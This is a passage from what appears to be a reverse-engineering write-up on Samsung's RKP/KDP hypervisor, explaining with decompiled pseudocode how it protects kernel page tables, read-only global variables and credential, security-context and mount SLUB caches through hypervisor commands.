  return rkp_l3pgt_process_table(*desc_p & 0xfffffffff000, start_addr, is_alloc, protect);
}

Third Level

Processing of the third level tables (or PTs) is done by the rkp_l3pgt_process_table function. If the PT maps the kernel text, the PTE of the kernel text start is saved into the stext_ptep global variable. If the PT doesn't need to be protected, the function then returns without further processing.

If the PT is being introduced, it is marked as L3 in the physmap, and made read-only in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping non executable VAs have their PXN bit set.

If the PT is being retired, it is marked as FREE in the physmap and a violation is triggered. If the violation doesn't panic (though it should after initialization since rkp_panic_on_violation is set), the PT is made writable in the second stage. The descriptors of the PT are processed: invalid descriptors trigger violations, and descriptors mapping executable VAs trigger violations.

int64_t rkp_l3pgt_process_table(int64_t pte, uint64_t start_addr, uint32_t is_alloc, int32_t protect) {
  // ...

  cs_enter(&l3pgt_lock);
  // If `stext_ptep` hasn't been set already, and this PT maps the kernel text (i.e. the first virtual address mapped
  // and the kernel text have the same PGD, PUD, PMD indexes), then set `stext_ptep` to the PTE of the kernel text
  // start.
  if (!stext_ptep && ((TEXT ^ start_addr) & 0x7fffe00000) == 0) {
    stext_ptep = pte + 8 * ((TEXT >> 12) & 0x1ff);
    uh_log('L', "rkp_l3pgt.c", 74, "set stext ptep %lx", stext_ptep);
  }
  cs_exit(&l3pgt_lock);
  // If we don't need to protect this PT, return without processing it.
  if (!protect) {
    return 0;
  }
  rkp_phys_map_lock(pte);
  // If we are introducing this PT.
  if (is_alloc) {
    // If it is not marked as a PT in the physmap, return without processing it.
    if (is_phys_map_l3(pte)) {
      uh_log('L', "rkp_l3pgt.c", 87, "Process l3t SKIP %lx, %d, %d", pte, 1, start_addr >> 39);
      rkp_phys_map_unlock(pte);
      return 0;
    }
    // Compute the correct type (`KERNEL` or not).
    if (start_addr >> 39) {
      type = KERNEL | L3;
    } else {
      type = L3;
    }
    // And mark the PT as such in the physmap.
    res = rkp_phys_map_set(pte, type);
    if (res < 0) {
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Make the PT read-only in the second stage.
    res = rkp_s2_page_change_permission(pte, 0x80 /* read-only */, 0 /* non-executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 102, "Process l3t failed %lx, %d", pte, 1);
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Now iterate over each descriptor of the PT.
    offset = 0;
    desc_p = pte;
    do {
      addr = offset | start_addr & 0xffffffffffe00fff;
      if (addr >> 39) {
        desc = *desc_p;
        if (desc) {
          // Invalid descriptor, trigger a violation.
          if ((desc & 0b11) != 0b11) {
            rkp_policy_violation("Invalid l3e, %lx, %lx, %d", desc, desc_p, 1);
          }
          // Page descriptor, if the virtual address mapped by this descriptor is not executable, then set the PXN bit.
          if (!executable_regions_contains(addr, 3)) {
            set_pxn_bit_of_desc(desc_p, 3);
          }
        }
      } else {
        uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
               (addr >> 21) & 0x1ff);
      }
      offset += 0x1000;
      ++desc_p;
    } while (offset != 0x200000);
  }
  // If we are retiring this PT.
  else {
    // If it is not marked as a PT in the physmap, return without processing it.
    if (!is_phys_map_l3(pte)) {
      uh_log('L', "rkp_l3pgt.c", 110, "Process l3t SKIP, %lx, %d, %d", pte, 0, start_addr >> 39);
      rkp_phys_map_unlock(pte);
      return 0;
    }
    // Mark the PT as `FREE` in the physmap.
    res = rkp_phys_map_set(pte, FREE);
    if (res < 0) {
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Protected PTs are not allowed to be retired, so trigger a violation. If we did not panic, continue.
    rkp_policy_violation("Free l3t not allowed, %lx, %d, %d", pte, 0, start_addr >> 39);
    // Make the PT writable in the second stage.
    res = rkp_s2_page_change_permission(pte, 0 /* writable */, 1 /* executable */, 0);
    if (res < 0) {
      uh_log('L', "rkp_l3pgt.c", 127, "Process l3t failed, %lx, %d", pte, 0);
      rkp_phys_map_unlock(pte);
      return res;
    }
    // Now iterate over each descriptor of the PT.
    offset = 0;
    desc_p = pte;
    do {
      addr = offset | start_addr & 0xffffffffffe00fff;
      if (addr >> 39) {
        desc = *desc_p;
        if (desc) {
          // Invalid descriptor, trigger a violation.
          if ((desc & 0b11) != 0b11) {
            rkp_policy_violation("Invalid l3e, %lx, %lx, %d", *desc, desc_p, 0);
          }
          // Page descriptor, if the virtual address mapped by this descriptor is executable, trigger a violation.
          if (executable_regions_contains(addr, 3)) {
            rkp_policy_violation("RKP_b5438cb1");
          }
        }
      } else {
        uh_log('L', "rkp_l3pgt.c", 37, "L3t not kernel range, %lx, %d, %d", desc_p, (addr >> 30) & 0x1ff,
               (addr >> 21) & 0x1ff);
      }
      offset += 0x1000;
      ++desc_p;
    } while (offset != 0x200000);
  }
  rkp_phys_map_unlock(pte);
  return 0;
}

If functions processing the kernel page tables find something they consider a policy violation, they call rkp_policy_violation with a string that describes the violation as an argument. This function logs the message and calls uh_panic if rkp_panic_on_violation is set.

int64_t rkp_policy_violation(const char* message, ...) {
  // ...

  // Log the violation message and its arguments.
  res = rkp_log(0x4c, "rkp.c", 108, message, /* variable arguments */);
  // Panic if panic on violation is enabled.
  if (rkp_panic_on_violation) {
    uh_panic();
  }
  return res;
}

rkp_log is a wrapper around uh_log that adds the current time and CPU number to the message. It also calls bigdata_store_rkp_string to copy the formatted message to the analytics, or bigdata, region.
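Below is a minimal sketch of what such a wrapper could look like. Only uh_log, get_current_cpu, and bigdata_store_rkp_string are names that appear in the actual code; the time source (get_uptime here), the buffer size, the formatting helpers, and the return value are assumptions.

int64_t rkp_log(char level, const char* file, uint32_t line, const char* message, ...) {
  char buffer[1024];
  uint64_t length;
  va_list args;

  /* Prefix the message with the current time and the CPU number. */
  length = snprintf(buffer, sizeof(buffer), "[%lu][CPU%u] ", get_uptime(), get_current_cpu());
  /* Append the caller's formatted message. */
  va_start(args, message);
  vsnprintf(buffer + length, sizeof(buffer) - length, message, args);
  va_end(args);
  /* Log the final message and copy it into the bigdata (analytics) region. */
  uh_log(level, file, line, "%s", buffer);
  bigdata_store_rkp_string(buffer);
  return 0;
}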

Overall State After Startup

This section serves as a reference of the overall state after startup (normal and deferred) is finished. We go over each of the internal structures of RKP, as well as the hypervisor-controlled page tables, and detail their content and where it was added or removed.

Memlist dynamic_regions

Memlist protected_ranges

Memlist page_allocator.list

Memlist executable_regions

  • initialized in rkp_start
  • TEXT-ETEXT added in rkp_start
  • TRAMP_VALIAS page added in rkp_start
  • (values are added in dynamic_load_ins)
  • (values are removed in dynamic_load_rm)

Memlist dynamic_load_regions

  • initialized in rkp_start
  • (values are added in dynamic_load_add_dynlist)
  • (values are removed in dynamic_load_rm_dynlist)

Sparsemap physmap (based on dynamic_regions)

Sparsemap ro_bitmap (based on dynamic_regions)

Sparsemap dbl_bitmap (based on dynamic_regions)

Sparsemap robuf/page_allocator.map (based on dynamic_regions)

Page tables of EL2 stage 1

Page tables of EL1 stage 2

RKP and KDP Commands

We have seen in the previous sections how RKP manages to take full control of the kernel page tables and what it does when it processes them. We will now see how this is used to protect critical kernel data, mainly by allocating it on read-only pages and requiring hypervisor calls (HVCs) to modify it.

Protecting Kernel Data

Global Variables

All the global variables that need to be protected by RKP are annotated with either __rkp_ro or __kdp_ro in the kernel sources. These macros move the global variables to the .rkp_ro and .kdp_ro sections, respectively.

#ifdef CONFIG_UH_RKP
#define __page_aligned_rkp_bss      __section(.rkp_bss.page_aligned) __aligned(PAGE_SIZE)
#define __rkp_ro                __section(.rkp_ro)
// ...
#endif
#ifdef CONFIG_RKP_KDP
#define __kdp_ro                __section(.kdp_ro)
#define __lsm_ro_after_init_kdp __section(.kdp_ro)
// ...
#endif

These sections are part of the kernel's .rodata section, that is made read-only in the second stage in rkp_set_kernel_rox.

#define RO_DATA_SECTION(align)
// ...
    .rkp_ro          : AT(ADDR(.rkp_ro) - LOAD_OFFSET) {        \
        VMLINUX_SYMBOL(__start_rkp_ro) = .;     \
        *(.rkp_ro)                      \
        VMLINUX_SYMBOL(__stop_rkp_ro) = .;      \
        VMLINUX_SYMBOL(__start_kdp_ro) = .;     \
        *(.kdp_ro)                      \
        VMLINUX_SYMBOL(__stop_kdp_ro) = .;      \
        VMLINUX_SYMBOL(__start_rkp_ro_pgt) = .;     \
        RKP_RO_PGT                      \
        VMLINUX_SYMBOL(__stop_rkp_ro_pgt) = .;      \
    }                               \

Below is a list of all the global variables that are protected that way.

  • empty_zero_page: special page used for zero-initialized data and copy-on-write.
unsigned long empty_zero_page[PAGE_SIZE / sizeof(unsigned long)] __page_aligned_rkp_bss;
  • bm_pte, bm_pmd, bm_pud: PTEs, PMDs, and PUDs of the fixmap.
static pte_t bm_pte[PTRS_PER_PTE] __page_aligned_rkp_bss;
static pmd_t bm_pmd[PTRS_PER_PMD] __page_aligned_rkp_bss __maybe_unused;
static pud_t bm_pud[PTRS_PER_PUD] __page_aligned_rkp_bss __maybe_unused;
  • sys_sb, odm_sb, vendor_sb, art_sb, rootfs_sb: (Samsung) superblocks of mount namespaces to be protected by RKP.
struct super_block *sys_sb __kdp_ro = NULL;
struct super_block *odm_sb __kdp_ro = NULL;
struct super_block *vendor_sb __kdp_ro = NULL;
struct super_block *art_sb __kdp_ro = NULL;
struct super_block *rootfs_sb __kdp_ro = NULL;
  • is_recovery: (Samsung) indicates the device is in recovery mode.
int is_recovery __kdp_ro = 0;
  • rkp_init_data, rkp_s_bitmap_ro, rkp_s_bitmap_dbl, rkp_s_bitmap_buffer: (Samsung) RKP initialization data and bitmap pointers seen previously.
rkp_init_t rkp_init_data __rkp_ro = { /* ... */ };
sparse_bitmap_for_kernel_t* rkp_s_bitmap_ro __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_dbl __rkp_ro = 0;
sparse_bitmap_for_kernel_t* rkp_s_bitmap_buffer __rkp_ro = 0;
  • __check_verifiedboot: (Samsung) indicates that the VB state is orange.
int __check_verifiedboot __kdp_ro = 0;
  • rkp_cred_enable: (Samsung) indicates that RKP protects the tasks' credentials.
int rkp_cred_enable __kdp_ro = 0;
  • init_cred: the credentials of the init task.
struct cred init_cred __kdp_ro = { /* ... */ };
  • init_sec: (Samsung) the security context of the init task.
struct task_security_struct init_sec __kdp_ro;
  • selinux_enforcing: indicates that SELinux is enforcing and not permissive.
int selinux_enforcing __kdp_ro;
  • selinux_enabled: indicates that SELinux is enabled.
int selinux_enabled __kdp_ro = 1;
  • selinux_hooks: array containing all security hooks.
static struct security_hook_list selinux_hooks[] __lsm_ro_after_init_kdp = { /* ... */ };
  • ss_initialized: indicates that the SELinux policy has been loaded.
int ss_initialized __kdp_ro;

SLUB Allocator

RKP not only protects the global variables, but it also protects specific caches of the SLUB allocator by using read-only pages for those. These pages come from the hypervisor page allocator, and not the kernel one. There are 3 caches that are protected that way:

  • cred_jar_ro used for allocating struct cred;
  • tsec_jar used for allocating struct task_security_struct;
  • vfsmnt_cache used for allocating struct vfsmount.
#define CRED_JAR_RO     "cred_jar_ro"
#define TSEC_JAR        "tsec_jar"
#define VFSMNT_JAR      "vfsmnt_cache"

The read-only pages are allocated by the rkp_ro_alloc function, which invokes the RKP_RKP_ROBUFFER_ALLOC command.

static inline void *rkp_ro_alloc(void){
    u64 addr = (u64)uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_ALLOC, 0);
    if(!addr)
        return 0;
    return (void *)__phys_to_virt(addr);
}

Unsurprisingly, the allocate_slab function of the SLUB allocator calls rkp_ro_alloc if the cache is one of the three mentioned above. It then calls a command to inform RKP of the cache type: RKP_KDP_X50 for cred_jar_ro, RKP_KDP_X4E for tsec_jar, and RKP_KDP_X4F for vfsmnt_cache.

static struct page *allocate_slab(struct kmem_cache *s, gfp_t flags, int node)
{
    // ...
    if (s->name && 
        (!strcmp(s->name, CRED_JAR_RO) ||  
        !strcmp(s->name, TSEC_JAR)|| 
        !strcmp(s->name, VFSMNT_JAR))) {

        virt_page = rkp_ro_alloc();
        if(!virt_page)
            goto def_alloc;

        page = virt_to_page(virt_page);
        oo = s->min;
    } else {
    // ...
    /*
     * We modify the following so that slab alloc for protected data
     * types are allocated from our own pool.
     */
    if (s->name)  {
        u64 sc,va_page;
        va_page = (u64)__va(page_to_phys(page));

        if(!strcmp(s->name, CRED_JAR_RO)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X50, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        } 
        if(!strcmp(s->name, TSEC_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4E, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
        if(!strcmp(s->name, VFSMNT_JAR)){
            for(sc = 0; sc < (1 << oo_order(oo)) ; sc++) {
                uh_call(UH_APP_RKP, RKP_KDP_X4F, va_page, 0, 0, 0);
                va_page += PAGE_SIZE;
            }
        }
    }
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),1);
    // ...
}

The read-only pages are freed by the rkp_ro_free function, which invokes the RKP_RKP_ROBUFFER_FREE command.

static inline void rkp_ro_free(void *free_addr){
    uh_call_static(UH_APP_RKP, RKP_RKP_ROBUFFER_FREE, (u64)free_addr);
}

This function is called from free_ro_pages in the SLUB allocator, which iterates over all the pages to free. In addition to calling rkp_ro_free, it also invokes the command RKP_KDP_X48, which reverts changes made by the RKP_KDP_X50, RKP_KDP_X4E, and RKP_KDP_X4F commands.

static void free_ro_pages(struct kmem_cache *s,struct page *page, int order)
{
    unsigned long flags;
    unsigned long long sc,va_page;

    sc = 0;
    va_page = (unsigned long long)__va(page_to_phys(page));
    if(is_rkp_ro_page(va_page)){
        for(sc = 0; sc < (1 << order); sc++) {
            uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
            rkp_ro_free((void *)va_page);
            va_page += PAGE_SIZE;
        }
        return;
    }

    spin_lock_irqsave(&ro_pages_lock,flags);
    for(sc = 0; sc < (1 << order); sc++) {
        uh_call(UH_APP_RKP, RKP_KDP_X48, va_page, 0, 0, 0);
        va_page += PAGE_SIZE;
    }
    memcg_uncharge_slab(page, order, s);
    __free_pages(page, order);
    spin_unlock_irqrestore(&ro_pages_lock,flags);
}

And unsurprisingly, the __free_slab function of the SLUB allocator calls free_ro_pages if the cache is one of the three mentioned above.

static void __free_slab(struct kmem_cache *s, struct page *page)
{
    // ...
    dmap_prot((u64)page_to_phys(page),(u64)compound_order(page),0);
    // ...
    /* We free the protected pages here. */
    if (s->name && (!strcmp(s->name, CRED_JAR_RO) || 
        !strcmp(s->name, TSEC_JAR) || 
        !strcmp(s->name, VFSMNT_JAR))){
        free_ro_pages(s,page, order);
        return;
    }
    // ...
}

Because the pages of these caches are read-only, the kernel cannot update the freelist pointer of their objects and needs to call into the hypervisor. That is why the set_freepointer function of the SLUB allocator invokes the RKP_KDP_X44 command if the cache is one of the three mentioned above.

static inline void set_freepointer(struct kmem_cache *s, void *object, void *fp)
{
    // ...
    if (rkp_cred_enable && s->name && 
        (!strcmp(s->name, CRED_JAR_RO)|| !strcmp(s->name, TSEC_JAR) ||
                                    !strcmp(s->name, VFSMNT_JAR))) {
        uh_call(UH_APP_RKP, RKP_KDP_X44, (u64)object, (u64)s->offset,
            (u64)freelist_ptr(s, fp, freeptr_addr), 0);
    }
    // ...
}

One last feature of RKP related to the SLUB allocator is double-mapping prevention. You might have noticed, in the allocate_slab and __free_slab functions, calls to dmap_prot. It invokes the RKP_KDP_X4A command to notify the hypervisor that this address is being mapped.

static inline void dmap_prot(u64 addr,u64 order,u64 val)
{
    if(rkp_cred_enable)
        uh_call(UH_APP_RKP, RKP_KDP_X4A, order, val, 0, 0);
}

The cred_jar_ro and tsec_jar caches are created in cred_init. However, this function also invokes the RKP_KDP_X42 command to inform RKP of the size of the cred and task_security_struct structures so that it can handle them properly.

void __init cred_init(void)
{
    // ...
#ifdef  CONFIG_RKP_KDP
    if(rkp_cred_enable) {
        cred_jar_ro = kmem_cache_create("cred_jar_ro", sizeof(struct cred),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, cred_ctor);
        if(!cred_jar_ro) {
            panic("Unable to create RO Cred cache\n");
        }

        tsec_jar = kmem_cache_create("tsec_jar", rkp_get_task_sec_size(),
                0, SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT, sec_ctor);
        if(!tsec_jar) {
            panic("Unable to create RO security cache\n");
        }

        // ...
        uh_call(UH_APP_RKP, RKP_KDP_X42, (u64)cred_jar_ro->size, (u64)tsec_jar->size, 0, 0);
    }
#endif  /* CONFIG_RKP_KDP */
}

Similarly, the vfsmnt_cache cache is created in mnt_init. This function invokes the RKP_KDP_X41 command to inform RKP of the total size and offsets of various fields of the vfsmount structure.

void __init mnt_init(void)
{
    // ...
    vfsmnt_cache = kmem_cache_create("vfsmnt_cache", sizeof(struct vfsmount),
            0, SLAB_HWCACHE_ALIGN | SLAB_PANIC, cred_ctor_vfsmount);

    if(!vfsmnt_cache)
        panic("Failed to allocate vfsmnt_cache \n");

    rkp_ns_fill_params(nsparam,vfsmnt_cache->size,sizeof(struct vfsmount),(u64)offsetof(struct vfsmount,bp_mount),
                                        (u64)offsetof(struct vfsmount,mnt_sb),(u64)offsetof(struct vfsmount,mnt_flags),
                                        (u64)offsetof(struct vfsmount,data));
    uh_call(UH_APP_RKP, RKP_KDP_X41, (u64)&nsparam, 0, 0, 0);
  // ...
}

For reference, here is the structure ns_param_t given as an argument to the command:

typedef struct ns_param {
    u32 ns_buff_size;
    u32 ns_size;
    u32 bp_offset;
    u32 sb_offset;
    u32 flag_offset;
    u32 data_offset;
}ns_param_t;

And the rkp_ns_fill_params macro used to fill this structure is as follows:

#define rkp_ns_fill_params(nsparam,buff_size,size,bp,sb,flag,data)  \
do {                        \
    nsparam.ns_buff_size = (u64)buff_size;      \
    nsparam.ns_size  = (u64)size;       \
    nsparam.bp_offset = (u64)bp;        \
    nsparam.sb_offset = (u64)sb;        \
    nsparam.flag_offset = (u64)flag;        \
    nsparam.data_offset = (u64)data;        \
} while(0)

The mnt_init function initializing the vfsmnt_cache cache is called from vfs_caches_init.

void __init vfs_caches_init(void)
{
    // ...
    mnt_init();
    // ...
}

And the cred_init function, initializing the cred_jar_ro and tsec_jar cache, and the vfs_caches_init function, are called from start_kernel.

asmlinkage __visible void __init start_kernel(void)
{
    // ...
    cred_init();
    // ...
    vfs_caches_init();
    // ...
}

We have summarized which RKP commands are used by the SLUB allocator and for what purpose in the following table:

Command Function Description
RKP_RKP_ROBUFFER_ALLOC rkp_cmd_rkp_robuffer_alloc Allocate a read-only page
RKP_RKP_ROBUFFER_FREE rkp_cmd_rkp_robuffer_free Free a read-only page
RKP_KDP_X50 rkp_cmd_set_pages_ro_cred_jar Mark a slab of cred_jar
RKP_KDP_X4E rkp_cmd_set_pages_ro_tsec_jar Mark a slab of tsec_jar
RKP_KDP_X4F rkp_cmd_set_pages_ro_vfsmnt_jar Mark a slab of vfsmnt_jar
RKP_KDP_X48 rkp_cmd_ro_free_pages Unmark a slab
RKP_KDP_X44 rkp_cmd_cred_set_fp Set the freelist pointer inside an object
RKP_KDP_X4A rkp_cmd_prot_dble_map Prevent double mapping
RKP_KDP_X42 rkp_cmd_assign_cred_size Inform of the cred objects size
RKP_KDP_X41 rkp_cmd_assign_ns_size Inform of the ns objects size

We can now take a look at the hypervisor side of these commands, starting with the functions to allocate and free read-only pages.

rkp_cmd_rkp_robuffer_alloc simply allocates a page from the hypervisor page allocator (which uses the "robuf" region that we have seen earlier). The ha1/ha2 stuff is only used by the RKP test module and can be safely ignored.

int64_t rkp_cmd_rkp_robuffer_alloc(saved_regs_t* regs) {
  // ...

  // Request a page from the hypervisor page allocator.
  page = page_allocator_alloc_page();
  ret_p = regs->x2;
  // The following code is only used for testing purposes.
  if ((ret_p & 1) != 0) {
    if (ha1 != 0 || ha2 != 0) {
      rkp_policy_violation("Setting ha1 or ha2 should be done once");
    }
    ret_p &= 0xfffffffffffffffe;
    ha1 = page;
    ha2 = page + 8;
  }
  // If x2 contains a kernel pointer, store the page address into it.
  if (ret_p) {
    if (!page) {
      uh_log('L', "rkp.c", 270, "RKP_8f7b0e12");
    }
    *virt_to_phys_el1(ret_p) = page;
  }
  // Also store the page address into the x0 register.
  regs->x0 = page;
  return 0;
}

Similarly, rkp_cmd_rkp_robuffer_free simply gives the page back to the hypervisor page allocator.

int64_t rkp_cmd_rkp_robuffer_free(saved_regs_t* regs) {
  // ...

  // Sanity-checking on the page address in x2.
  if (!regs->x2) {
    uh_log('D', "rkp.c", 286, "Robuffer Free wrong address");
  }
  // Convert the VA given by the kernel into a PA.
  page = rkp_get_pa(regs->x2);
  // Free the page in the hypervisor page allocator.
  page_allocator_free_page(page);
  return 0;
}

The rkp_cmd_set_pages_ro_cred_jar, rkp_cmd_set_pages_ro_tsec_jar, and rkp_cmd_set_pages_ro_vfsmnt_jar functions are called by the kernel to inform the hypervisor of the cache type that a read-only page has been allocated for. These functions all end up calling rkp_set_pages_ro, but with different arguments.
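
As a minimal sketch (assuming the command handlers do nothing more than forward the saved registers with a type index, which is consistent with the switch statement in rkp_set_pages_ro below), the three wrappers presumably look like this:

int64_t rkp_cmd_set_pages_ro_cred_jar(saved_regs_t* regs) {
  // Hypothetical wrapper, for illustration only: type 0 maps to CRED.
  rkp_set_pages_ro(regs, 0);
  return 0;
}
int64_t rkp_cmd_set_pages_ro_tsec_jar(saved_regs_t* regs) {
  // Hypothetical wrapper: type 1 maps to SEC_PTR.
  rkp_set_pages_ro(regs, 1);
  return 0;
}
int64_t rkp_cmd_set_pages_ro_vfsmnt_jar(saved_regs_t* regs) {
  // Hypothetical wrapper: type 2 maps to NS.
  rkp_set_pages_ro(regs, 2);
  return 0;
}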

The rkp_set_pages_ro function converts the kernel VA into a PA, then marks the page as read-only in the second stage. It then wipes the page contents and marks it with the appropriate type (CRED, SEC_PTR, or NS) in the physmap.

uint8_t* rkp_set_pages_ro(saved_regs_t* regs, int64_t type) {
  // ...

  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 803, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Make the target page read-only in the second stage.
  if (rkp_s2_page_change_permission(page, 0x80 /* read-only */, 0 /* non-executable */, 0) == -1) {
    uh_log('L', "rkp_kdp.c", 813, "Cred: Unable to set permission %lx %lx %lx", regs->x2, page, 0);
  } else {
    // Reset the page to avoid leaking previous content.
    memset(page, 0xff, 0x1000);
    // Compute the corresponding type based on the argument.
    switch (type) {
      case 0:
        type = CRED;
        break;
      case 1:
        type = SEC_PTR;
        break;
      case 2:
        type = NS;
        break;
    }
    // Mark the page in the physmap.
    rkp_phys_map_set(page, type);
    return rkp_phys_map_unlock(page);
  }
  return rkp_phys_map_unlock(page);
}

The rkp_cmd_ro_free_pages function is called to revert the above changes when the page is being freed. It calls rkp_ro_free_pages, which also converts the kernel VA into a PA and verifies that the page is marked with one of the expected types in the physmap. If everything checks out, it makes the page writable in the second stage, zeroes it out, and marks it as FREE in the physmap.

uint8_t* rkp_ro_free_pages(saved_regs_t* regs) {
  // ...

  // Sanity-check: the kernel virtual address must be page-aligned.
  if ((regs->x2 & 0xfff) != 0) {
    return uh_log('L', "rkp_kdp.c", 843, "Page not aligned in set_page_ro %lx", regs->x2);
  }
  // Convert the kernel virtual address into a physical address.
  page = rkp_get_pa(regs->x2);
  rkp_phys_map_lock(page);
  // Check if the page is marked with the appropriate type in the physmap.
  if (!is_phys_map_cred(page) && !is_phys_map_ns(page) && !is_phys_map_sec_ptr(page)) {
    uh_log('L', "rkp_kdp.c", 854, "rkp_ro_free_pages : physmap_entry_invalid %lx %lx ", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Make the target page writable in the second stage.
  if (rkp_s2_page_change_permission(page, 0 /* writable */, 1 /* executable */, 0) < 0) {
    uh_log('L', "rkp_kdp.c", 862, "rkp_ro_free_pages: Unable to set permission %lx %lx %lx", regs->x2, page);
    return rkp_phys_map_unlock(page);
  }
  // Reset the page to avoid leaking current content.
  memset(page, 0, 0x1000);
  // Mark the page as `FREE` in the physmap.
  rkp_phys_map_set(page, FREE);
  return rkp_phys_map_unlock(page);
}

The rkp_cred_set_fp function is called by the SLUB allocator to change the freelist pointer (pointer to the next free object) of a read-only object. It ensures that the object is marked with the appropriate type in the physmap and that the next freelist pointer is marked with the same type. It does some sanity-checking on the object address and pointer offset before finally updating the freelist pointer within the object.

void rkp_cred_set_fp(saved_regs_t* regs) {
  // ...

  // Convert the object virtual address into a physical address.
  object_pa = rkp_get_pa(regs->x2);
  // `offset` is the offset of the freelist pointer in the object.
  offset = regs->x3;
  // `freelist_ptr` is the value to be written at `offset` in the object.
  freelist_ptr = regs->x4;
  rkp_phys_map_lock(object_pa);
  // Ensure the object is located in one of the 3 caches.
  if (!is_phys_map_cred(object_pa) && !is_phys_map_sec_ptr(object_pa) && !is_phys_map_ns(object_pa)) {
    uh_log('L', "rkp_kdp.c", 242, "Neither Cred nor Secptr %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_cred = is_phys_map_cred(object_pa);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    // If not, trigger a policy violation.
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
    rkp_phys_map_unlock(object_pa);
  }
  rkp_phys_map_unlock(object_pa);
  // If the freelist pointer (next free object) is not NULL.
  if (freelist_ptr) {
    // Convert the next free object VA into a PA.
    freelist_ptr_pa = rkp_get_pa(freelist_ptr);
    rkp_phys_map_lock(freelist_ptr_pa);
    // Ensure the next free object is also located in one of the 3 caches.
    if (!is_phys_map_cred(freelist_ptr_pa) && !is_phys_map_sec_ptr(freelist_ptr_pa) &&
        !is_phys_map_ns(freelist_ptr_pa)) {
      uh_log('L', "rkp_kdp.c", 259, "Invalid Free Pointer %lx %lx %lx", regs->x2, regs->x3, regs->x4);
      is_cred = is_phys_map_cred(freelist_ptr_pa);
      is_sec_ptr = is_phys_map_sec_ptr(freelist_ptr_pa);
      // If not, trigger a policy violation.
      rkp_policy_violation("Data Protection Violation %lx %lx %lx", is_cred, is_sec_ptr, regs->x4);
      rkp_phys_map_unlock(freelist_ptr_pa);
    }
    rkp_phys_map_unlock(freelist_ptr_pa);
  }
  // Sanity-checking on the object address within the page and freelist pointer offset.
  if (invalid_cred_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 267, "Invalid cred pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_sec_ptr_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 272, "Invalid Security pointer_fp 111 %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    is_sec_ptr = is_phys_map_sec_ptr(object_pa);
    uh_log('L', "rkp_kdp.c", 273, "Invalid Security pointer_fp 222 %lx %lx %lx %lx %lx", is_sec_ptr, regs->x2,
           regs->x2 - regs->x2 / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE, offset, rkp_cred->SP_SIZE);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  } else if (invalid_ns_fp(object_pa, regs->x2, offset)) {
    uh_log('L', "rkp_kdp.c", 278, "Invalid Namespace pointer_fp!! %lx %lx %lx", regs->x2, regs->x3, regs->x4);
    rkp_policy_violation("Data Protection Violation %lx %lx %lx", regs->x2, regs->x3, regs->x4);
  }
  // Update the freelist pointer within the object if the checks passed.
  else {
    *(offset + object_pa) = freelist_ptr;
  }
}

The invalid_cred_fp, invalid_sec_ptr_fp, and invalid_ns_fp functions all do the same checks. They ensure the object PA is marked with the appropriate type in the physmap, that the VA is aligned on the object size, and finally that the freelist pointer offset is equal to the object size (which is the case for caches with a constructor).

int64_t invalid_cred_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `CRED` in the physmap.
  if (!is_phys_map_cred(object_pa) ||
      // Ensure the object VA is aligned on the size of the cred structure.
      object_va && object_va == object_va / rkp_cred->CRED_BUFF_SIZE * rkp_cred->CRED_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the cred structure.
          rkp_cred->CRED_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}
int64_t invalid_sec_ptr_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `SEC_PTR` in the physmap.
  if (!is_phys_map_sec_ptr(object_pa) ||
      // Ensure the object VA is aligned on the size of the task_security_struct structure.
      object_va && object_va == object_va / rkp_cred->SP_BUFF_SIZE * rkp_cred->SP_BUFF_SIZE &&
          // Ensure the offset is equal to the size of the task_security_struct structure.
          rkp_cred->SP_SIZE == offset) {
    rkp_phys_map_unlock(object_pa);
    return 0;
  } else {
    rkp_phys_map_unlock(object_pa);
    return 1;
  }
}
int64_t invalid_ns_fp(int64_t object_pa, uint64_t object_va, int64_t offset) {
  rkp_phys_map_lock(object_pa);
  // Ensure the object PA is marked as `NS` in the physmap.
  if (!is_phys_map_ns(object_pa) ||
